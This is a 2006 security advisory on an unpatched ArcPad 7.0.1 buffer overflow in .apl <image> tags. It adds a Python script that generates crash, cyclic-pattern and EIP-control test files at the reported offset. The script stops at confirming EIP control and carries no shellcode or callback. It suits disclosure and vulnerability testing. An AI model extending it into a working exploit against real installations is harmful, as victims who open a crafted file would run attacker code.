Security Advisory B009 - ArcPad 7.0.1 .apl File Processing Buffer Overflow Lets Remote User Execute Arbitrary Code
==================

Release Date: November 5, 2006

Impact: A remote user can cause arbitrary code to be executed on a target computer when the target user opens a malicious .apl file. The code will run with the privileges of the target user.

Vendor URL: http://www.esri.com/

Vulnerable Versions: Tested on v7.0.1; previous versions are probably vulnerable as well.

Description:
ESRI ArcPad 7 is software for mobile GIS and field mapping applications using handheld and mobile devices. By default, .apl files are not automatically opened with ArcPad. However, .apm files are, and these files can link to .apl files. An unchecked buffer in the way ArcPad 7.0.1 processes .apl files allows a remote user to take control of EIP, and thus execute arbitrary code with the privileges of the target user.

The buffer overflow occurs when a long string is supplied inside an <image></image> tag. A 13,383-byte string was used while testing. The easiest way to reproduce this bug is probably to take the "Redlands" example provided with the ArcPad installation, edit Parks.apl and add about 11,800 bytes to the string that is already there. EIP is overwritten by the bytes at position 2311 of the string.
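The following Python script is an added example, not part of this advisory and not ESRI's code. It generates the three .apl test files a tester would want in sequence: a plain long string to confirm the crash, a non-repeating cyclic pattern (the Metasploit pattern_create/pattern_offset scheme, reimplemented here) to locate which bytes land in EIP, and a file with a 4-byte marker at the reported offset to confirm control. The elements wrapping the <image> tag are placeholders; the advisory's own reproduction edits the <image> value inside the shipped Parks.apl, and that is the better approach since the real file layout is not reproduced here. "Position 2311" is taken as a 0-based index, which is exactly the kind of off-by-one the pattern step is meant to settle.

```python
"""Generate ArcPad .apl test files for the <image> overflow and map a crashed EIP to an offset.

Added example, not part of the advisory. Assumptions (not from the advisory):
  - the elements wrapping <image> are placeholders; the advisory's actual
    reproduction edits the <image> value inside the shipped Redlands Parks.apl
  - "position 2311" is taken as a 0-based index into the string
  - the cyclic pattern is the Metasploit pattern_create/pattern_offset scheme
"""
import string

PAYLOAD_LEN = 13383   # string length the advisory reports using in testing
EIP_OFFSET = 2311     # offset at which the advisory reports EIP being overwritten


def cyclic_pattern(length):
    """Non-repeating 'Aa0Aa1...Zz9' pattern: every 4-byte window is unique in the
    first 20280 bytes, so a value seen in EIP maps back to exactly one offset."""
    if length > 26 * 26 * 10 * 3:
        raise ValueError("pattern is only unique up to 20280 bytes")
    parts = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                parts.append(upper + lower + digit)
                if len(parts) * 3 >= length:
                    return "".join(parts)[:length]
    return "".join(parts)[:length]


def pattern_offset(eip_value, pattern):
    """Offset of the bytes that landed in EIP, given either the 4 ASCII chars or the
    DWORD shown by the debugger (little-endian, as x86 stores it). Returns -1 if absent."""
    if isinstance(eip_value, int):
        needle = eip_value.to_bytes(4, "little").decode("ascii")
    else:
        needle = eip_value
    return pattern.find(needle)


def eip_control_payload(marker, offset=EIP_OFFSET, total=PAYLOAD_LEN, filler="A"):
    """String of `total` bytes with the 4-char `marker` placed at `offset`, so a crash
    with EIP == marker confirms the offset before any real payload is built."""
    if len(marker) != 4:
        raise ValueError("marker must be exactly 4 bytes")
    if offset + 4 > total:
        raise ValueError("marker does not fit inside the payload")
    tail = total - offset - 4
    return filler * offset + marker + filler * tail


def build_apl(image_value):
    """Wrap `image_value` in an <image> tag inside a placeholder .apl skeleton.
    Only the <image> tag comes from the advisory; the surrounding elements are assumed."""
    if any(c in image_value for c in "<>&"):
        raise ValueError("image value must not contain XML metacharacters")
    return (
        '<?xml version="1.0" encoding="utf-8"?>\n'
        "<ArcPad>\n"            # placeholder root element (assumption)
        "  <LAYER>\n"           # placeholder layer element (assumption)
        "    <image>" + image_value + "</image>\n"
        "  </LAYER>\n"
        "</ArcPad>\n"
    )


def write_apl(path, image_value):
    """Write the test file; returns the length of the image string written."""
    with open(path, "w", encoding="utf-8", newline="") as fh:
        fh.write(build_apl(image_value))
    return len(image_value)


if __name__ == "__main__":
    # 1. Crash check: a plain long string, as used in the advisory.
    write_apl("crash.apl", "A" * PAYLOAD_LEN)
    # 2. Offset location: cyclic pattern; feed the crashed EIP DWORD to pattern_offset().
    pattern = cyclic_pattern(PAYLOAD_LEN)
    write_apl("offset.apl", pattern)
    print("example: EIP 0x7a43307a ->", pattern_offset(0x7a43307a, pattern))
    # 3. Control check: marker at the reported offset; EIP should then read 0x42424242.
    write_apl("control.apl", eip_control_payload("BBBB"))
```

Open offset.apl in ArcPad under a debugger, take the EIP value from the access violation and pass it to pattern_offset(); if it returns 2311, the advisory's figure is a 0-based offset and control.apl should crash with EIP 0x42424242. If it returns 2310, the figure was 1-based and EIP_OFFSET should be adjusted before building anything further.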

Solution/Status:
The vendor has been contacted multiple times but has never responded. No patch is available yet.